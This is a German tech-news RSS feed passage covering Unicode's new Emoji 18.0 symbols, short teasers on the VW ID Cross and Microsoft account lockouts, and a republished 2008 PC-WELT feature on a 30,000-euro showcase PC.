<p>Unicode hat jetzt neun neue Emojis <a href="https://blog.unicode.org/2026/07/why-do-some-new-emoji-look-familiar.html">vorgestellt</a>, die Teil von Emoji 18.0 sind. Zu den Neuheiten gehören ein lächelnder Smiley mit einem Riss im Mund, ein Daumen nach links und einer nach rechts, ein Monarchfalter, eine eingelegte Gurke, ein Leuchtturm, ein Meteor, ein Radiergummi und ein Kescher.</p>



<p>Gleichzeitig nutzt Unicode die Gelegenheit, um mehrere seit Langem bestehende Verwechslungen zwischen bestehenden Emojis zu klären. So erhält beispielsweise der Meteor ein eigenes Symbol, wodurch der Komet wieder als blauer Eiskomet statt als Feuerball dargestellt werden kann. Ebenso erhält die eingelegte Gurke ein eigenes Emoji, sodass die Gurke nicht mehr beide darstellen muss.</p>



<p>Auch bei den Schmetterlingen wird die Unterscheidung deutlicher. Der neue Monarchfalter erhält einen eigenen Platz, was das Problem beheben soll, dass verschiedene Plattformen dasselbe Emoji entweder als Monarchfalter oder als blauen Morpho-Schmetterling dargestellt haben.</p>



<p>Auf <a href="https://blog.unicode.org/2026/07/why-do-some-new-emoji-look-familiar.html">dieser Seite</a> stellt Unicode jedes neue Emoji ausdrücklich vor. Nehmen wir als Beispiel die Beschreibung für “Das lächelnde Gesicht mit den Rissen”:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Denn manchmal bedeutet „Mir geht’s gut!“ in Wirklichkeit „Mir geht’s überhaupt nicht gut!“</p>



<p>Eine visuelle Darstellung eines inneren Bruchs. Es ist die „Maske der Perfektion“, die in Echtzeit zerbricht. Sie geht über gewöhnliche Emotionen hinaus und fängt genau jene Spannung zwischen deinem öffentlichen Auftreten und deiner privaten Realität ein. Verwende sie, wenn deine sorgfältig aufgebaute Fassade Risse bekommen hat, du aber trotz der Scherben weiterlächelst.</p>
</blockquote>



<p>Oder die – nun ja: etwas verschwurbelte – Erklärung zum Kescher:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Während man auf seiner Tastatur leicht Substantive erkennen kann (wie einen Destillierkolben oder einen Eimer), fungiert das Netz sofort als Verb. Es steht für den Vorgang, etwas aus dem digitalen Äther einzufangen oder herauszuziehen. Vielleicht sammelst du Daten, fängst eine Stimmung ein oder sammelst, was auch immer du sammelst. Wenn ein Emoji mehr als nur ein Objekt sein und eine Handlung darstellen kann, verleiht es unserem digitalen Wortschatz etwas, wonach er sich sehnt: kinetische Energie.</p>
</blockquote>



<p>Die neuen Emoji-Symbole werden voraussichtlich im Frühjahr 2027 auf Smartphones und anderen Geräten erscheinen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[VW ID Cross vorgestellt: Volkswagen zeigt die neue Elektro-Hoffnung]]></title>
<description><![CDATA[Der VW ID Polo ist bereits offiziell und kann bestellt werden, laut Volkswagen ist das Interesse groß, doch in diesem Jahr folgt noch ein Modell in dieser Klasse, denn mit …]]></description>
<link>https://tsecurity.de/de/3670218/it-nachrichten/vw-id-cross-vorgestellt-volkswagen-zeigt-die-neue-elektro-hoffnung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670218/it-nachrichten/vw-id-cross-vorgestellt-volkswagen-zeigt-die-neue-elektro-hoffnung/</guid>
<pubDate>Wed, 15 Jul 2026 12:03:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1600" height="1100" src="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/07/vw-id-cross-2026-seite.jpg?fit=1600%2C1100&amp;ssl=1" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/07/vw-id-cross-2026-seite.jpg?w=1600&amp;ssl=1 1600w, https://i0.wp.com/www.mobiflip.de/wp-content/uploads/2026/07/vw-id-cross-2026-seite.jpg?resize=690%2C474&amp;ssl=1 690w" sizes="(max-width: 1600px) 100vw, 1600px">
Der VW ID Polo ist bereits offiziell und kann bestellt werden, laut Volkswagen ist das Interesse groß, doch in diesem Jahr folgt noch ein Modell in dieser Klasse, denn mit …]]></content:encoded>
</item>
<item>
<title><![CDATA[Willkür bei gesperrten Microsoft-Konten: Das späte Erwachen der US-Medien]]></title>
<description><![CDATA[Seit vielen Jahren beackern wir auf dieser Seite regelmäßig ein Ärgernis, an dem sich bis heute nichts geändert hat: Microsoft sperrt Konten von Privatnutzern und bietet keinerlei Möglichkeiten zur Klärung oder Schlichtung. Die Betroffenen verlieren unter Umständen ihre digitale Identität, fast i...]]></description>
<link>https://tsecurity.de/de/3670143/it-nachrichten/willkuer-bei-gesperrten-microsoft-konten-das-spaete-erwachen-der-us-medien/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670143/it-nachrichten/willkuer-bei-gesperrten-microsoft-konten-das-spaete-erwachen-der-us-medien/</guid>
<pubDate>Wed, 15 Jul 2026 11:17:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><img src="https://www.drwindows.de/news/wp-content/uploads/2022/03/microsoft_logo_titelbild-720x360.jpg" class="attachment-single-thumb size-single-thumb wp-post-image" alt="Microsoft Logo Titelbild" decoding="async" fetchpriority="high" srcset="https://www.drwindows.de/news/wp-content/uploads/2022/03/microsoft_logo_titelbild.jpg 720w, https://www.drwindows.de/news/wp-content/uploads/2022/03/microsoft_logo_titelbild-300x150.jpg 300w, https://www.drwindows.de/news/wp-content/uploads/2022/03/microsoft_logo_titelbild-643x322.jpg 643w" sizes="(max-width: 720px) 100vw, 720px"></div>
<p>Seit vielen Jahren beackern wir auf dieser Seite regelmäßig ein Ärgernis, an dem sich bis heute nichts geändert hat: Microsoft sperrt Konten von Privatnutzern und bietet keinerlei Möglichkeiten zur Klärung oder Schlichtung. Die Betroffenen verlieren unter Umständen ihre digitale Identität, fast immer aber Geld und Daten. Mit vielen Jahren Verzögerung scheint das Problem jetzt auch […]</p>
<p>Der Beitrag <a href="https://www.drwindows.de/news/willkuer-bei-gesperrten-microsoft-konten-das-spaete-erwachen-der-us-medien">Willkür bei gesperrten Microsoft-Konten: Das späte Erwachen der US-Medien</a> erschien zuerst auf <a href="https://www.drwindows.de/news">Dr. Windows</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vor 18 Jahren: Höllenmaschine 3 –  gewinnen Sie den 30.000-Euro-PC]]></title>
<description><![CDATA[Hinweis: Dieser Artikel erschien am 3. März 2008 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der Wayback Machine des Internet Archive das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte füh...]]></description>
<link>https://tsecurity.de/de/3670019/it-nachrichten/vor-18-jahren-hoellenmaschine-3-gewinnen-sie-den-30000-euro-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670019/it-nachrichten/vor-18-jahren-hoellenmaschine-3-gewinnen-sie-den-30000-euro-pc/</guid>
<pubDate>Wed, 15 Jul 2026 10:33:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hinweis: Dieser Artikel erschien am 3. März 2008 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der <a href="https://web.archive.org/" target="_blank" rel="noreferrer noopener">Wayback Machine des Internet Archive</a> das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen.</p>



<p>Hier geht es direkt zum <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">Gewinnspiel der aktuellen Höllenmaschine HMX 6 im Gesamtwert von 40.000 Euro</a>. Bestens informiert bleiben Sie mit unserem <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen. Und nun viel Spaß mit der dritten Höllenmaschine:</p>



<p>Herzschlagfinale: Diesmal haben wir wirklich auf den letzten Drücker den Herstellern die Prototypen für die CeBIT aus den Händen gerissen und sind trotzdem rechtzeitig fertig geworden. Deshalb können wir Ihnen auf dem Messegelände in Hannover unseren 30.000-Euro-Super-PC live in Aktion präsentieren:</p>



<p>Vom 4. bis 7. März 2008 ist die Höllenmaschine 3 zu Gast am Stand von <a href="https://web.archive.org/web/20080305171342/http:/www.tt-germany.com/" target="_blank" rel="noreferrer noopener">Thermaltake</a> (<strong>Halle 24, Stand C02</strong>). Und am CeBIT-Wochenende, vom 8. bis 9. März 2008, finden Sie unseren Traumrechner in der Messehalle von Intel (<strong>Pavillon P33</strong>, befindet sich zwischen Halle 12 und 26). Dort finden die <a href="https://web.archive.org/web/20080305171342/http:/www.esl-world.net/masters/cebit2008_eventpage/" target="_blank" rel="noreferrer noopener">Intel Extreme Masters II Finals der ESL</a> statt. Zwischen den Finalspielen präsentieren wir Ihnen auf der Showbühne am Samstag um 10:00, 12:30 und 16:45 Uhr sowie am Sonntag um 10:00, 12:15 und 16:45 Uhr die Höllenmaschine 3 live in Aktion.</p>



<p>Und wer es nicht zur CeBIT schafft, hat bei der <a href="https://web.archive.org/web/20080305171342/http:/www.dcmm.de/" target="_blank" rel="noreferrer noopener">Deutschen Casemod Meisterschaft 2008</a> eine weitere Gelegenheit, die Höllenmaschine 3 hautnah zu erleben. Der Wettbewerb, für den wir unseren 30.000-Euro-Rechner schon angemeldet haben, findet vom 19. bis 20. April 2008 auf der <a href="https://web.archive.org/web/20080305171342/http:/westfalenhallen.de/messen/hobbytronic/index.php" target="_blank" rel="noreferrer noopener">Hobbytronic</a> in Dortmund statt.</p>



<h2 class="wp-block-heading toc">Grafik: Quad SLI</h2>



<p>Der erste Prototyp, den wir bei der Höllenmaschine 3 einsetzen, kommt vom Grafikspezialisten <a href="https://web.archive.org/web/20080305171342/http:/www.nvidia.de/page/home.html" target="_blank" rel="noreferrer noopener">Nvidia</a>. Die Referenzkarte Nvidia Geforce 9800 GX2 beherbergt gleich zwei Grafikchips, die gemeinsam die 3D-Berechnung übernehmen. In der Höllenmaschine 3 haben wir zwei dieser Doppeldecker-Grafikkarten verbaut, die über ein spezielles Datenkabel (<a href="https://web.archive.org/web/20080305171342/http:/de.wikipedia.org/wiki/Scalable_Link_Interface" target="_blank" rel="noreferrer noopener">Scalable Link Interface Bridge</a>) verbunden sind. Dadurch beteiligen sich also insgesamt vier Grafikchips parallel an der 3D-Berechnung und arbeiten damit de facto im Quad-SLI-Modus.</p>



<p>Nvidias Doppeldecker-Grafikkarte Geforce 9800 GX2 besitzt gleich zwei externe Stromanschlüsse: eine 6- sowie eine 8-polige PCI-Express-Strombuchse. Wie viel die Geforce 9800 GX2 unter Volllast verbraucht, erfahren Sie nach der CeBIT in unserem großen Test zur Höllenmaschine 3.</p>



<p>Momentan verwenden wir die beiden Grafikkarten mit der von Nvidia entwickelten Kühler-Lüfter-Kombination. Die Zeit war für die kanadischen Kühlungsspezialisten von <a href="https://web.archive.org/web/20080305171342/http:/www.coolitsystems.com/" target="_blank" rel="noreferrer noopener">Coolit Systems</a> einfach zu knapp, um passende Kühlkörper anzufertigen, die für die Kompressorkühlung der Höllenmaschine 3 ausgelegt sind.</p>



<p>Daher laufen die zwei Geforce-9800-GX2-Grafikkarten derzeit noch mit den von Nvidia freigegebenen Standard-Taktraten. Aber bis spätestens Ende März 2008 sollte die Spezialanfertigung von Coolit Systems fertig sein – wir rüsten sie auf jeden Fall noch nach, um dann auch noch die Grafikkarten übertakten zu können.</p>



<p>Apropos Taktraten: Die Geforce 9800 GX2 möchte Nvidia offiziell erst Mitte März 2008 vorstellen. Damit wir die beiden High-End-Grafikkarten bereits jetzt in die Höllenmaschine 3 einbauen konnten, mussten wir eine Vertraulichkeitsvereinbarung (NDA, non-disclosure agreement) unterzeichnen, an die wir uns natürlich auch halten.</p>



<p>Deshalb können wir Ihnen momentan nicht allzu viel über das Grafikartengespann verraten. Wie das nebenstehende Bild zeigt, besitzt Nvidias Geforce 9800 GX2 zwei Dual-Link-DVI-Ausgänge zum Anschluss von zwei Bildschirmen. Zur Leistungsfähigkeit der Doppeldecker-Duos sei nur so viel gesagt: Selbst das derzeit hardwarehungrigste 3D-Spiel Crysis läuft mit höchster Bildqualität bei hohen Auflösungen flüssig. Wenn Sie auf der CeBIT sind, können Sie sich bei einer der vielen Live-Demonstrationen selbst überzeugen.</p>



<h2 class="wp-block-heading toc">Prozessoren: 8 x 4 GHz</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a57459e7a055"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Intel-Core-2-Extreme-QX9775.jpg?quality=50&amp;strip=all" alt="Intel Core 2 Extreme QX9775" class="wp-image-3185715" width="385" height="486" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Intel </p></div>



<p>Die beiden High-End-CPUs Intel Core 2 Extreme QX9775 zum Stückpreis von rund 1300 Euro arbeiten mit einem Werkstakt von 3,2 GHz – dank Kompressorkühlung laufen sie in der Höllenmaschine 3 stabil mit 4 GHz. Jedem Quad-Core steht ein gemeinsamer 12 MB großer L2-Cache zur Verfügung. Der Cache rechnet 24-fach assoziativ – das sorgt für eine effektivere Nutzung des Pufferspeichers.</p>



<p>Der Systemtakt des Core 2 Extreme QX9775 beträgt 400 (effektiv 1600) MHz. Damit erreicht der Transferdurchsatz, den jeder der beiden LGA771-Prozessoren pro Sekunde austauschen kann, bis zu 25,6 GB/s. Der 3,2-GHz-Quad-Core unterstützt <a href="https://web.archive.org/web/20080305174307/http:/www.tecchannel.de/server/hardware/402269/" target="_blank" rel="noreferrer noopener">Fully Buffered DIMM</a> der DDR2-Spezifikationen PC800 und PC667. Dass der Core 2 Extreme QX9775 Server-Speicher benötigt und den CPU-Steckplatz der Xeon-Baureihe nutzt, ist kein Zufall: Der QX9775 ist eigentlich ein Xeon X5482, dem Intel einen freien Multiplikator spendiert hat und ihn so zum „Extreme“-Prozessor aufgewertet.</p>



<p>Das Prozessor-Duo basiert auf Intels 45-Nanometer-Architektur „Harpertown“. Mit an Bord der neuen Architektur sind <a href="https://web.archive.org/web/20080305174307/http:/download.intel.com/technology/architecture/new-instructions-paper.pdf" target="_blank" rel="noreferrer noopener">47 Befehle der x86-Erweiterung SSE4</a>. Die neuen Instruktionen sollen vor allem Multimedia-Anwendungen wie Musik- und Video-Encodierung beschleunigen – sofern der Software-Hersteller die SSE4-Befehle in den Programmcode einpflegt.</p>



<p>Dies ist beispielsweise bei der aktuellen Version des Divx-Codecs und der Bildbearbeitung Adobe Photoshop der Fall. Aber auch 3D-Spiele soll SSE4 beschleunigen, etwa bei der Physikberechnung. Das ist aber noch Zukunftsmusik: Das erste Spiel, bei dem dies der Fall sein wird, ist der für Ende 2008 angekündigte Titel „Alan Wake“.</p>



<p>Mehrere Betriebssysteme: Der Core 2 Extreme QX9775 unterstützt die <a href="https://web.archive.org/web/20080305174307/http:/www.intel.com/technology/platform-technology/virtualization/index.htm" target="_blank" rel="noreferrer noopener">Virtualisierungs-Technik Intel VT</a> sowie 32-und 64-Bit-Betriebssysteme – interessant für Nutzer, die etwa virtuelle Server mit unterschiedlichen Betriebssystemen einrichten möchten. Mit einem Acht-Kern-System wie der Höllenmaschine 3, die ja auch beim Arbeitsspeicher nicht knausert, lässt sich da so einiges realisieren.</p>



<h2 class="wp-block-heading toc">Ausstattung der Höllenmaschine 3 im Überblick</h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>Komponente</strong></td><td><strong>Modell</strong></td><td><strong>Preis</strong> <strong>(Euro)</strong> am 3.3.2008</td></tr><tr><td><strong>Hauptplatine</strong></td><td>Intel D5400XS “Skulltrail”  </td><td>500  </td></tr><tr><td><strong>Prozessor</strong></td><td>2 x Intel Core 2 Extreme QX9775, 3,2@4 GHz  </td><td>2600  </td></tr><tr><td><strong>Speicher</strong></td><td>4 x 2 GB Samsung PC800 FB-DIMM  </td><td>1000  </td></tr><tr><td><strong>Grafik</strong></td><td>2 x Nvidia Geforce 9800 GX2  </td><td>1500  </td></tr><tr><td><strong>Controller</strong></td><td>Adaptec ICP Vortex 5085BL, 8-Port, 256 MB RAM, PCI-E  </td><td>500  </td></tr><tr><td><strong>Festplatten</strong></td><td>4 x 300 GB Seagate Cheetah 15K.5 ST3300655SS, SAS  </td><td>2400  </td></tr><tr><td><strong>.</strong></td><td>4 x 1 TB Seagate Barracuda 7200.11 ST31000340AS, SATA 300  </td><td>1200  </td></tr><tr><td><strong>Brenner</strong></td><td>Bluray-HD-DVD-Laufwerk LG Electronics GGW-H20L, SATA  </td><td>400  </td></tr><tr><td><strong>Gehäuse</strong></td><td>Case-Mod “PC-WELT Höllenmaschine 3” auf Basis des Cube-Towers Thermaltake Mozart TX VE 1000BNS von Heiko Polaczek  </td><td>6000  </td></tr><tr><td><strong>Kompressor-Kühlung</strong></td><td>Coolit Systems Freezone Elite für CPUs (ab Ende März 2008 auch für GPUs und Chipsatz)  </td><td>4000  </td></tr><tr><td><strong>Netzteil</strong></td><td>Thermaltake Toughpower 2000W, ATX 12V 2.3, EPS 2.92  </td><td>400  </td></tr><tr><td><strong>Eingabegeräte</strong></td><td>Gyration Go 2.4 Optical Air und Media Center Remote Suite  </td><td>400  </td></tr><tr><td><strong>Bildschirme</strong></td><td>30-Zoll-Breitbild-TFT Eizo SX3031W  </td><td>2500  </td></tr><tr><td><strong>.</strong></td><td>7-Zoll-TFT-Touchscreen von Thermaltake, Laufwerkseinschub  </td><td>400  </td></tr><tr><td><strong>Betriebssystem</strong></td><td>Microsoft Windows 2008 Server und Vista Ultimate  </td><td>1800  </td></tr><tr><td><strong>Software</strong></td><td>Adobe Creative Suite 3 Master Collection  </td><td>3500  </td></tr><tr><td><strong>.</strong></td><td>Microsoft Office 2007 Professional    </td><td>500</td></tr></tbody></table></figure>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a57459e7a796"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/HM3-Titel.jpg?quality=50&amp;strip=all&amp;w=1200" alt="2008: Die Höllenmaschine 3" class="wp-image-3161808" width="1200" height="600" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PC-WELT</p></div>



<h2 class="wp-block-heading toc">Hauptplatine: Intel Skulltrail mit 8 GB RAM</h2>



<p>Wichtigstes Merkmal der rund 500 Euro teuren Intel D5400XS, Codename Skulltrail, sind die beiden LGA771-Prozessorsteckplätze – erst dadurch lassen sich die beiden Core 2 Extreme QX9775 parallel betreiben. Zu den weiteren Besonderheiten der Intel-Hauptplatine gehören zwei Nvidia-Chips namens Nforce 100 MCP. Sie bringen 32 zusätzliche PCI-Express-Datenleitungen sowie SLI-Unterstützung mit:</p>



<p>Damit kann Intel vier 16x-PCI-Express-Steckplätze auf der D5400XS unterbringen und diese auch jeweils 16fach elektrisch ansteuern. Da die beiden Nforce 100 MCP im Dauerbetrieb recht heiß werden, versieht Intel die zwei Nvidia-Chips inklusive der Northbridge mit einem Kühlkörper samt Lüfter.</p>



<p>Um die Stabilität der Höllenmaschine 3 zu erhöhen, wollen wir ab Mitte März die Intel-Lösung durch eine speziell angefertigte Kompressorkühlung unseres kanadischen Koopertionspartners Coolit Systems ersetzen.</p>



<p>Die Intel-Hauptplatine setzt auf den Server-Chipsatz 5400, Codename Seaburg. Beim 5400-Chipsatz arbeitet der Front Side Bus allerdings mit 400 (effektiv 1600) MHz. Den voll gepufferten DDR2-Speicher (FB-DIMM) bindet er ebenfalls mit 400 MHz ins System ein.</p>



<p>Die D5400XS im E-ATX-Format (305 x 330 Millimeter) sieht für jeden der vier FB-DIMM-Steckplätze einen eigenen Speicherkanal vor. Sowohl die Speichertaktraten als auch die RAM-Spannung lassen sich im BIOS der D5400XS manipulieren – ideal fürs Übertakten. Die maximale Ausbaustufe beträgt 8 GB fully buffered PC800- oder PC667-DDR2-SDRAM (4 x 2 GB).</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a57459e7ae4d"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Intel-D5400XS.jpg?quality=50&amp;strip=all&amp;w=992" alt="Intel D5400XS" class="wp-image-3185724" width="992" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Intel </p></div>



<p>Neben den vier 16x-PCI-Express-Steckplätzen, die allerdings nur den Standard PCI-Express 1.1 erfüllen, besitzt die Intel D5400XS noch zwei PCI-Steckplätze gemäß Version 2.3. Des Weiteren bietet die D5400XS-Hauptplatine noch einen Anschluss für zwei IDE-Laufwerke sowie üppige sechs SATA-300-Port inklusive zwei eSATA-Buchsen. Hinzu kommen zehn USB-2.0-Ports, zwei Firewire-Anschlüsse und eine 10/100/1000-MBit-Netzwerkbuchse. Bereits im Chipsatz integriert ist ein HD-Audiochip für 7.1-Raumklang mit einem optischen S/PDIF-Ausgang und den fünf üblichen Klinkenstecker-Buchsen.</p>



<h2 class="wp-block-heading toc">Arbeitsspeicher: 4 x 2 GB DDR2-SDRAM</h2>



<p>Wir bestücken alle vier Speicherbänke der Intel D5400XS mit Fully Buffered DDR2-800-SDRAM – und zwar mit den 2-GB-Modulen Samsung M395T5663QZ4-CF76. Die Speicherriegel nutzen zusätzliche Datenleitungen für die Datenintegritätsprüfung. Für eine schnellere Datenverarbeitung steht jedem Speichersteckplatz ein eigener Datenkanal zur Verfügung. Die FB-DIMM-Module laufen mit den Zugriffszeiten 666-11 und arbeiten mit effektiv 800 MHz.</p>



<h2 class="wp-block-heading toc">System-Festplatten: 4 x SAS </h2>



<p>Die Höllenmaschine 3 vertraut auf Server-Laufwerke für die Betriebssystem-Installationen. Dazu nutzen wir vier 300-GB-Festplatten mit der Punkt-zu-Punkt-Verbindung Serial Attached SCSI (SAS). SAS ist der Nachfolger der parallelen SCSI-Schnittstelle und bietet eine theoretische Datentransferrate von bis zu 300 MB/s, die sich im Gegensatz zu SATA 300 in der Praxis mit Raid-Konfigurationen auch tatsächlich annähernd erreichen lässt.</p>



<p>Unsere Wahl fiel auf das Modell Seagate Cheetah 15K.5 ST3300655SS mit 300 GB Kapazität. Preis pro Stück: rund 500 Euro. Das 3,5-Zoll-Laufwerk rotiert mit 15.000 Umdrehungen pro Minute, der Datenpuffer beträgt 16 MB. Die durchschnittliche Zugriffszeit der Cheetah 15K.4 liegt laut Hersteller bei 2 Millisekunden.</p>



<p>Die Zuverlässigkeit respektive MTBF (Mean Time Between Failures) der SAS-Laufwerke gibt Seagate mit 1,4 Millionen Betriebsstunden an. Die Annualized Failure Rate (AFR), also die Wahrscheinlichkeit, dass ein Laufwerk innerhalb eines Jahres ausfällt, liegt laut Hersteller bei 0,62 Prozent. Hier gibt’s detaillierte Informationen zur <a href="https://www.seagate.com/docs/pdf/de-DE/datasheet/disc/ds-cheetah-15k-5-de.pdf" target="_blank" rel="noreferrer noopener">Seagate Cheetah 15K.5 ST3300655SS</a>.</p>



<p>Noch mehr Tempo kitzeln wir aus der Cheetah 15K.5, indem wir die vier der SAS-Laufwerke mittels der PCI-Express-Controller-Karte Adaptec ICP Vortex 5085BL zu einem Raid-10-Verbund koppeln. Zwei Laufwerke fungieren dabei als Raid-0-Verbund: Dadurch lässt sich im Idealfall die Datentransferrate fast verdoppeln, da der SAS-Controller den Datenstrom in kleine Pakete zerlegt (Striping), die er simultan auf das Plattenduo schreibt beziehungsweise davon liest. Um eine hundertprozentige Datensicherheit zu gewährleisten, arbeiten die beiden anderen SAS-Laufwerke im Raid-1-Modus und spiegeln so den Datenbestand des Raid-0-Verbundes.</p>



<p>Umsonst gibt’s die Datensicherheit allerdings nicht: Durch den Raid-10-Verbund halbiert sich die nutzbare Kapazität des Laufwerk-Quartetts auf knapp 550 GB. Damit Systemprogramme und Applikationen möglichst verzögerungsfrei starten und arbeiten, haben wir die Betriebssysteme sowie alle Programme und Benchmarks auf der SAS-Partition installiert.</p>



<h2 class="wp-block-heading toc">Massenspeicher: 4 x 1000 GB</h2>



<p>Ausreichend Platz für umfangreiche Musik- und Video-Sammlungen gibt’s auf der zweiten Partition der Höllenmaschine 3: Sie besteht aus vier 1000-GB-Laufwerken des Typs Seagate Barracuda 7200.11 ST31000340AS, die für den 24-Stunden-Betrieb ausgelegt sind. Wir haben die vier Terabyte-Speichermonster ebenfalls zu einem Raid-10-Verbund gebündelt. Die Festplatten bieten dann zusammen eine formatierte Kapazität von knapp 1,9 Terabyte. Der Pufferspeicher der Barracuda 7200.11 beträgt übrigens 32 MB.</p>



<p>Die Barracuda 7200.11 setzt auf die SATA-300-Schnittstelle, die eine theoretische Transferrate von bis zu 300 MB/s erreicht. In der Praxis erzielen Sie diesen Wert zwar nicht, bei einem Raid-0-Verbund aus zwei Platten dürfen Sie aber durchschnittlich mit deutlich über 100 MB/s rechnen. Damit verwalten und archivieren Sie selbst große Videodateien sehr flott.</p>



<p>Die Seagate Barracuda 7200.11 ST31000340AS ist technisch auf der Höhe der Zeit: Das 3,5-Zoll-Laufwerk beherrscht die Technik Native Command Queuing (NCQ). NCQ erlaubt der Festplatte, die vom System geforderten Zugriffe selbstständig zu verwalten. Sie kann so die optimale Reihenfolge der Zugriffe ermitteln: Das spart zusätzliche Drehbewegungen, verkürzt damit die Wegstrecken, die der Schreib-/Lesekopf zurücklegen muss, und sorgt ergo für ein höheres Tempo.</p>



<p>Eine höhere Datenübertragungsrate lässt sich auch mit Perpendicular Recording erzielen, da die Datenbits nicht mehr horizontal, sondern vertikal auf dem Datenträger angeordnet sind. Auch diese moderne Technik setzt die Barracuda 7200.11 ein. Hier finden Sie detaillierte Informationen zur Spezifikation der <a href="https://www.seagate.com/docs/pdf/datasheet/disc/ds_barracuda_7200_11.pdf" target="_blank" rel="noreferrer noopener">Seagate Barracuda 7200.11 ST31000340AS</a>.</p>



<h2 class="wp-block-heading toc">Multi-Spieler: Blu-Ray, DVD und HD-DVD</h2>



